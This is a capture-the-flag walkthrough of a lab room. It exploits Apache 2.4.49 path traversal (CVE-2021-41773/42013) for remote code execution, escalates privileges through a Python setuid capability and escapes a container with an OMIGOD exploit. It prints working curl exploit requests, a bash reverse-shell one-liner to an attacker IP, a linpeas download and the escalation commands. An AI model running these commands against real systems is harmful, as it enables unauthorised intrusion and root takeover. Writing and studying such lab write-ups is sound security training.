Oh my webserver
This is a great room created by tinyBoy, where we get RCE using Apache and obtain a reverse shell, after that we can do privesc using Python and after shockingly discovering the user flag on the root directory, we realize we’re trapped in a container. Finally, we use some exploit against the host machine to obtain the final flag.
Apache HTTP Server Path Traversal & Remote Code Execution (CVE-2021-41773 & CVE-2021-42013) |…
On October 4, 2021, Apache HTTP Server Project released Security advisory on a Path traversal and File disclosure…
# Nmap 7.92 scan initiated Fri Mar 4 15:22:30 2022 as: nmap -sC -sV -p- -vv -oA scan -Pn 10.10.185.209
Nmap scan report for 10.10.185.209 (10.10.185.209)
Host is up, received user-set (0.23s latency).
Scanned at 2022-03-04 15:22:31 EST for 410s
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| 3072 e0:d1:88:76:2a:93:79:d3:91:04:6d:25:16:0e:56:d4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMlfGBGWZkPg98VnvD+FVeesHsQwmtoJfMOMhifMjxD9AEluFQNVnoyxyQi5y9O2/AN/MO+l57li33lHiVjD1eglBjB3Lkzz3tpRJSmGn2Ug3jRypShkSJ9VkUVFElw8MXke62w3+9pi+S0Ub1DqcttGH8TqihiWvqJbJYnecqjdcka1uKPdPna0gleow9JiaAH3X4EMFdcXZDOGgnOaZId2mEXFDeNNYFZpS+EOcLgXaAp1NobUckE9NXvE73qw+pBNo69m3z4MG7/cJNIsQiFpm5yqgCKJGjhwGFp4zAMXOD23lj1g+iQlwrchwY5nBEHHae1PjQwLjwuWebjWR+bWPalPVYa4d8+15TjjgV8VW/Rac3rTX+A/buyVxUSMhkBtn7fQ2sLoMPPn7vRDo3ggGl5IZaYIvSYRDk9nadsZk+YKUCSgFf97z0PK278vbrPwjJTyyScAnjvs+oLnD/bAdja4uwOOS2CHehjzipVmWf7zR3srIfjZQ4aAUmeh8=
| 256 91:18:5c:2c:5e:f8:99:3c:9a:1f:04:24:30:0e:aa:9b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLf6FvNwGNtpra24lyJ4YWPqB8olwPXhKdr6gSW6Dc+oXdZJbQPtpD7cph3nvR9sQQnTKGiG69XyGKh0ervYI1U=
| 256 d1:63:2a:36:dd:94:cf:3c:57:3e:8a:e8:85:00:ca:f6 (ED25519)
80/tcp closed http reset ttl 60
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 4 15:29:21 2022 -- 1 IP address (1 host up) scanned in 410.87 seconds
/.hta (Status: 403) [Size: 199]
/.htaccess (Status: 403) [Size: 199]
/.htpasswd (Status: 403) [Size: 199]
/cgi-bin/ (Status: 403) [Size: 199]
/index.html (Status: 200) [Size: 45]
After visiting the site we see that there’s not much for us to exploit…
I used Wappalyzer to see that we were dealing with Apache’s version 2.4.49 so I decided to do some research and ended up founding CVE-2021–41773 & CVE-2021–42013
If you want to learn more about the exploit I highly advice you to check out this other room, since I also used it in order to get the initial access.
First I used this request just to see if I could get the passwd file
curl -v 'http://10.10.185.209/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; cat /etc/passwd' -H "Content-Type: text/plain"
Since I was able to get it I decided to use this one liner to leverage a reverse shell
sh -i >& /dev/tcp/10.13.19.12/1234 0>&1
Now let’s just includ it in our original request
curl -v 'http://10.10.185.209/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; sh -i >& /dev/tcp/10.13.19.12/1234 0>&1' -H "Content-Type: text/plain"
and before sending it, let’s start our listener
nc -lnvp 1234
Great! Now we’re in.
The first odd thing that pops up, is the fact that there are no users on the machine. Weird, isn’t it? Since there seems to be no user flag anywhere I decided to do some Privilege Escalation.
I uploaded Linpeas to the machine by first downloading the bash script and starting a local http server using python
python3 -m http.server 80
and downloading it on the other machine using curl, inside the tmp directory
curl http://10.13.19.12/linpeas.sh -o linpeas.sh
now give it permissions
bash +x linpeas.sh
and finally run it
Once its done, we analyze the output and find that Python has Capabilities (great!) and it also seems we’re trapped inside a container…
Current: = cap_chown
/usr/bin/python3.7 = cap_setuid+ep
So the next thing is to leverage Python to obtain root. For this I used GTFOBins
python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
Then we can get user flag :D
So…we’re root, but we’re still trapped…let’s see what can we do now
After reviewing the Linpeas output, we find our IP is 172.17.0.2, so we can assume the host’s IP is…wait for it…172.17.0.1…great!
════════════════════════════════════╣ Network Information ╠════════════════════════════════════
╔══════════╣ Hostname, hosts and DNS
::1 localhost ip6-localhost ip6-loopback
in the tmp folder, where we uploaded the beautiful peas, we find a weird script called omi.py, which is based on this CVE. Since we know that the machine we’re in isn’t vulnerable, we can make a wild guess and try it against the host.
I did this
python3 omi.py -t 172.17.0.1 -c whoami
and got root, but since we’re already root, it’s kind of confusing…so Iran this instead
python3 omi.py -t 172.17.0.1 -c pwd
and boooom, we got a hit. Now the last thing is hope that we can get our flag.
python3 omi.py -t 172.17.0.1 -c "cd /root; cat root.txt"
And that’s all :)
I enjoyed this machine a ton, since it uses a recent CVE and the container is a little nice twist, thanks to the box creator.